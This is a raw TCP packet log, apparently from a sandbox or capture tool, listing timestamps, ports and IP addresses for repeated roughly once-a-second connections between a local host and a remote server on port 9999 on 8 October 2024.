Oct 8, 2024 04:19:22.643541098 CEST	57242	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:22.643678904 CEST	57242	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:22.648495913 CEST	9999	57242	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:23.610960007 CEST	9999	57242	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:23.610980988 CEST	9999	57242	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:23.611068964 CEST	57242	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:23.611068964 CEST	57242	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:23.611207962 CEST	57242	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:23.617299080 CEST	9999	57242	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:23.716296911 CEST	57243	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:23.721465111 CEST	9999	57243	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:23.721529961 CEST	57243	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:23.722069025 CEST	57243	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:23.727004051 CEST	9999	57243	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:24.657315016 CEST	9999	57243	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:24.657376051 CEST	9999	57243	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:24.657532930 CEST	57243	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:24.657568932 CEST	57243	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:24.662365913 CEST	9999	57243	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:24.763413906 CEST	57244	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:24.768385887 CEST	9999	57244	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:24.771400928 CEST	57244	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:24.771400928 CEST	57244	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:24.776365042 CEST	9999	57244	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:25.698555946 CEST	9999	57244	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:25.698575974 CEST	9999	57244	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:25.698643923 CEST	57244	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:25.698810101 CEST	57244	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:25.703586102 CEST	9999	57244	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:25.810075998 CEST	57245	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:25.815267086 CEST	9999	57245	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:25.815475941 CEST	57245	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:25.815562963 CEST	57245	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:25.820600986 CEST	9999	57245	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:26.866636038 CEST	9999	57245	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:26.866662979 CEST	9999	57245	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:26.866749048 CEST	9999	57245	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:26.867038965 CEST	57245	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:26.867039919 CEST	57245	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:26.867132902 CEST	57245	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:26.872117043 CEST	9999	57245	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:26.981856108 CEST	57246	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:26.987006903 CEST	9999	57246	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:26.987097025 CEST	57246	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:26.987217903 CEST	57246	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:26.992124081 CEST	9999	57246	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:27.898148060 CEST	9999	57246	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:27.898211002 CEST	57246	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:27.898268938 CEST	9999	57246	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:27.898320913 CEST	57246	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:28.015001059 CEST	57246	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:28.015604019 CEST	57247	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:28.020009041 CEST	9999	57246	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:28.020467997 CEST	9999	57247	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:28.020539045 CEST	57247	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:28.020628929 CEST	57247	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:28.025506973 CEST	9999	57247	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:28.940165043 CEST	9999	57247	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:28.940191984 CEST	9999	57247	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:28.940253973 CEST	57247	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:28.940519094 CEST	57247	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:28.945502996 CEST	9999	57247	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:29.044527054 CEST	57248	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:29.049506903 CEST	9999	57248	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:29.049583912 CEST	57248	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:29.049690962 CEST	57248	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:29.054383039 CEST	9999	57248	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:29.987798929 CEST	9999	57248	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:29.987915993 CEST	57248	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:29.988030910 CEST	9999	57248	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:29.988092899 CEST	57248	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:30.090850115 CEST	57248	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:30.091079950 CEST	57249	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:30.095756054 CEST	9999	57248	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:30.095926046 CEST	9999	57249	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:30.096009970 CEST	57249	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:30.096118927 CEST	57249	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:30.101118088 CEST	9999	57249	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:31.005108118 CEST	9999	57249	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:31.005137920 CEST	9999	57249	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:31.005394936 CEST	57249	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:31.005395889 CEST	57249	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:31.005455971 CEST	57249	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:31.010406017 CEST	9999	57249	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:31.106760979 CEST	57250	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:31.111813068 CEST	9999	57250	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:31.112008095 CEST	57250	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:31.112009048 CEST	57250	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:31.117002964 CEST	9999	57250	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:32.006633043 CEST	9999	57250	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:32.006655931 CEST	9999	57250	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:32.006804943 CEST	57250	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:32.006805897 CEST	57250	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:32.022727013 CEST	57250	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:32.027880907 CEST	9999	57250	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:32.138463974 CEST	57251	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:32.144032955 CEST	9999	57251	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:32.144411087 CEST	57251	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:32.144459963 CEST	57251	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:32.149682045 CEST	9999	57251	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:33.047207117 CEST	9999	57251	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:33.047261000 CEST	9999	57251	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:33.047420979 CEST	57251	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:33.050493956 CEST	57251	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:33.055401087 CEST	9999	57251	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:33.153718948 CEST	57252	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:33.158621073 CEST	9999	57252	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:33.159451008 CEST	57252	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:33.159580946 CEST	57252	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:33.164643049 CEST	9999	57252	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:34.088340998 CEST	9999	57252	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:34.088438988 CEST	57252	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:34.088498116 CEST	9999	57252	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:34.088547945 CEST	57252	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:34.088606119 CEST	57252	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:34.093574047 CEST	9999	57252	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:34.200604916 CEST	57253	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:34.205646038 CEST	9999	57253	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:34.205754042 CEST	57253	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:34.205888987 CEST	57253	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:34.211046934 CEST	9999	57253	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:35.109730959 CEST	9999	57253	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:35.109781981 CEST	9999	57253	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:35.109958887 CEST	57253	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:35.109960079 CEST	57253	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:35.114470005 CEST	57253	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:35.119353056 CEST	9999	57253	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:35.216341972 CEST	57254	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:35.222204924 CEST	9999	57254	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:35.222554922 CEST	57254	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:35.222645998 CEST	57254	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:35.228470087 CEST	9999	57254	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:36.140678883 CEST	9999	57254	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:36.140712023 CEST	9999	57254	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:36.140969038 CEST	57254	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:36.144481897 CEST	57254	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:36.149457932 CEST	9999	57254	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:36.247288942 CEST	57255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:36.252449036 CEST	9999	57255	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:36.252537012 CEST	57255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:36.252635956 CEST	57255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:36.257641077 CEST	9999	57255	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:37.156517029 CEST	9999	57255	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:37.156543016 CEST	9999	57255	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:37.156591892 CEST	57255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:37.156632900 CEST	57255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:37.163351059 CEST	57255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:37.168373108 CEST	9999	57255	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:37.278723955 CEST	57256	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:37.284214973 CEST	9999	57256	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:37.284334898 CEST	57256	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:37.284548044 CEST	57256	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:37.289798975 CEST	9999	57256	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:38.202826977 CEST	9999	57256	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:38.202857018 CEST	9999	57256	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:38.202974081 CEST	57256	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:38.204121113 CEST	57256	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:38.208904982 CEST	9999	57256	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:38.313237906 CEST	57257	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:38.318214893 CEST	9999	57257	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:38.318286896 CEST	57257	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:38.319267988 CEST	57257	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:38.324006081 CEST	9999	57257	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:39.232949972 CEST	9999	57257	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:39.233048916 CEST	9999	57257	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:39.233093023 CEST	57257	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:39.233186007 CEST	57257	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:39.233206034 CEST	57257	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:39.238060951 CEST	9999	57257	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:39.341320992 CEST	57258	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:39.346472025 CEST	9999	57258	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:39.346590996 CEST	57258	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:39.346759081 CEST	57258	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:39.351552963 CEST	9999	57258	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:40.274807930 CEST	9999	57258	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:40.274935007 CEST	9999	57258	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:40.274976969 CEST	57258	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:40.275063992 CEST	57258	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:40.276987076 CEST	57258	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:40.281949043 CEST	9999	57258	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:40.390074968 CEST	57259	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:40.395087004 CEST	9999	57259	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:40.395256042 CEST	57259	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:40.395332098 CEST	57259	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:40.400382996 CEST	9999	57259	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:41.305258989 CEST	9999	57259	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:41.305278063 CEST	9999	57259	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:41.305449009 CEST	57259	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:41.305449009 CEST	57259	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:41.310280085 CEST	9999	57259	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:41.419325113 CEST	57260	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:41.424385071 CEST	9999	57260	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:41.424582958 CEST	57260	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:41.424583912 CEST	57260	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:41.429418087 CEST	9999	57260	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:42.327342987 CEST	9999	57260	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:42.327366114 CEST	9999	57260	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:42.327506065 CEST	57260	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:42.334501982 CEST	57260	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:42.339436054 CEST	9999	57260	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:42.450476885 CEST	57261	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:42.455571890 CEST	9999	57261	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:42.455652952 CEST	57261	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:42.455738068 CEST	57261	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:42.460844040 CEST	9999	57261	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:43.399584055 CEST	9999	57261	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:43.399601936 CEST	9999	57261	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:43.399661064 CEST	57261	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:43.399796009 CEST	57261	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:43.404604912 CEST	9999	57261	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:43.512996912 CEST	57262	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:43.518177986 CEST	9999	57262	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:43.518280983 CEST	57262	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:43.518434048 CEST	57262	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:43.523499012 CEST	9999	57262	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:44.409564972 CEST	9999	57262	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:44.409588099 CEST	9999	57262	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:44.409634113 CEST	57262	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:44.409709930 CEST	57262	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:44.409780025 CEST	57262	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:44.416024923 CEST	9999	57262	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:44.513211966 CEST	57263	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:44.518241882 CEST	9999	57263	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:44.518429041 CEST	57263	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:44.518429995 CEST	57263	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:44.523425102 CEST	9999	57263	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:45.456677914 CEST	9999	57263	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:45.456705093 CEST	9999	57263	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:45.456892014 CEST	57263	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:45.456892014 CEST	57263	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:45.456996918 CEST	57263	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:45.461882114 CEST	9999	57263	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:45.559812069 CEST	57264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:45.564836025 CEST	9999	57264	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:45.564939976 CEST	57264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:45.565092087 CEST	57264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:45.570172071 CEST	9999	57264	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:46.457436085 CEST	9999	57264	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:46.457479954 CEST	9999	57264	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:46.457545042 CEST	57264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:46.457588911 CEST	57264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:46.457690954 CEST	57264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:46.462486029 CEST	9999	57264	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:46.560012102 CEST	57265	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:46.565356970 CEST	9999	57265	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:46.565449953 CEST	57265	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:46.565603971 CEST	57265	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:46.570806026 CEST	9999	57265	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:47.476684093 CEST	9999	57265	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:47.476706028 CEST	9999	57265	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:47.476753950 CEST	57265	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:47.476844072 CEST	57265	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:47.476885080 CEST	57265	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:47.481697083 CEST	9999	57265	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:47.591217041 CEST	54000	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:47.596245050 CEST	9999	54000	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:47.596349955 CEST	54000	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:47.596470118 CEST	54000	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:47.601455927 CEST	9999	54000	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:48.500065088 CEST	9999	54000	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:48.500091076 CEST	9999	54000	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:48.500123024 CEST	54000	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:48.500159025 CEST	54000	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:48.500271082 CEST	54000	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:48.505044937 CEST	9999	54000	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:48.607011080 CEST	54001	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:48.611964941 CEST	9999	54001	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:48.612029076 CEST	54001	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:48.612185001 CEST	54001	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:48.616966009 CEST	9999	54001	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:49.531492949 CEST	9999	54001	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:49.531517029 CEST	9999	54001	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:49.531754971 CEST	54001	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:49.539366007 CEST	54001	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:49.544220924 CEST	9999	54001	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:49.674520969 CEST	54002	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:49.679609060 CEST	9999	54002	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:49.680959940 CEST	54002	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:49.682339907 CEST	54002	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:49.687196016 CEST	9999	54002	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:50.589086056 CEST	9999	54002	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:50.589169979 CEST	54002	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:50.589312077 CEST	9999	54002	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:50.589365959 CEST	54002	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:50.700678110 CEST	54002	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:50.700872898 CEST	54003	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:50.705678940 CEST	9999	54002	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:50.705713034 CEST	9999	54003	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:50.705780983 CEST	54003	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:50.705895901 CEST	54003	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:50.710850954 CEST	9999	54003	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:51.620675087 CEST	9999	54003	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:51.620702982 CEST	9999	54003	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:51.620831966 CEST	54003	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:51.620918989 CEST	54003	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:51.625758886 CEST	9999	54003	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:51.731920958 CEST	54004	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:51.737025976 CEST	9999	54004	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:51.737098932 CEST	54004	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:51.737292051 CEST	54004	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:51.742161036 CEST	9999	54004	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:52.660442114 CEST	9999	54004	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:52.660479069 CEST	9999	54004	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:52.660561085 CEST	54004	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:52.660583019 CEST	54004	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:52.662543058 CEST	54004	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:52.667278051 CEST	9999	54004	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:52.778624058 CEST	54005	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:52.783807039 CEST	9999	54005	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:52.783899069 CEST	54005	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:52.783988953 CEST	54005	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:52.789278984 CEST	9999	54005	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:53.691529989 CEST	9999	54005	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:53.691550970 CEST	9999	54005	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:53.691905022 CEST	54005	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:53.692001104 CEST	54005	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:53.696819067 CEST	9999	54005	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:53.794509888 CEST	54006	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:53.799645901 CEST	9999	54006	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:53.799777031 CEST	54006	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:53.800003052 CEST	54006	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:53.804791927 CEST	9999	54006	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:54.732208967 CEST	9999	54006	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:54.732434034 CEST	54006	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:54.732546091 CEST	9999	54006	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:54.732707024 CEST	54006	9999	192.168.2.4	47.239.242.141
